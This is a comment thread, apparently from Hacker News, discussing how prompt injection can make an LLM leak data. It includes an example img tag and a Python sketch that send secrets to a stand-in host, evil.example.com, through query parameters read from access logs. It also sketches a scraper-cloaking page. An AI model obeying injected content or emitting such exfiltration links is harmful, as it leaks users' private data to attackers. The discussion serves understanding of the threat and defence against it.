Comment by quuxplusone
3 days ago
Ah, perhaps answering myself: if the attacker can get the LLM to say "here, look at this HTML content in your browser: ... img src="https://evil.example.com/exfiltrate.jpg?data= ...", then a large number of human users will do exactly that.
Yes, even a GET request can change the state of the external world, even if that's strictly speaking against the spec.
Wasn't there an HN post where someone made their website look different to LLMs or web scrapers than to a typical user? I can't seem to find the post, but that could add an extra layer (the page really is different depending on whether you're viewing it from a browser vs. curl).
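The cloaking idea above can be sketched in a few lines. This is a hypothetical illustration, not the site from that post: `BOT_MARKERS` is an assumed list of User-Agent substrings (GPTBot and ClaudeBot are real crawler tokens, but the exact list a site would use is a guess):

```python
# Hypothetical sketch: serve different content depending on whether the
# User-Agent header looks like a bot/LLM scraper or a normal browser.
BOT_MARKERS = ("curl", "python-requests", "GPTBot", "ClaudeBot")  # assumed list

def page_for(user_agent: str) -> str:
    """Return the page body a server might send for this User-Agent."""
    if any(marker.lower() in user_agent.lower() for marker in BOT_MARKERS):
        return "Nothing to see here."   # what scrapers/LLMs get
    return "Welcome, human reader!"     # what browsers get

print(page_for("curl/8.4.0"))                       # the scraper view
print(page_for("Mozilla/5.0 (X11; Linux x86_64)"))  # the browser view
```

Of course, a scraper can spoof its User-Agent, so this is an extra layer at best, not a defense.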
Yes, and GET requests with the sensitive data in the query parameters are often used to exfiltrate data. The attacker doesn't even need to set up a special handler, as long as they can read the access logs.
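A minimal sketch of why no special handler is needed (the domain, path, and parameter name are made up): the payload is just URL-encoded into the query string, so a stock web server already records it verbatim in its access log:

```python
from urllib.parse import urlencode, urlparse, parse_qs

secret = "api_key=sk-live-12345"  # hypothetical stolen value

# The injected instruction only has to get the victim to fetch this URL,
# e.g. via an <img src=...> tag:
exfil_url = "https://evil.example.com/pixel.gif?" + urlencode({"d": secret})

# On the attacker's side, a default access log already contains the full
# request line, something like:
#   GET /pixel.gif?d=api_key%3Dsk-live-12345 HTTP/1.1
# so recovering the secret is just parsing the logged URL back out:
recovered = parse_qs(urlparse(exfil_url).query)["d"][0]
assert recovered == secret
```

The request can even return a valid 1x1 image (or a 404, it doesn't matter); the exfiltration happened the moment the request line hit the log.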
Once again affirming that prompt injection is social engineering for LLMs. To a first approximation, humans and LLMs have the same failure modes, and at the system-design level they belong to the same class. I.e., LLMs are little people on a chip; don't put one where you wouldn't put the other.
They are worse than people: LLMs combine toddler-level critical thinking with intern-level technical skills, and read much, much faster than any person can.
Right. But my point is, they belong in the bucket labeled "people", not the one labeled "software", for the purposes of system design.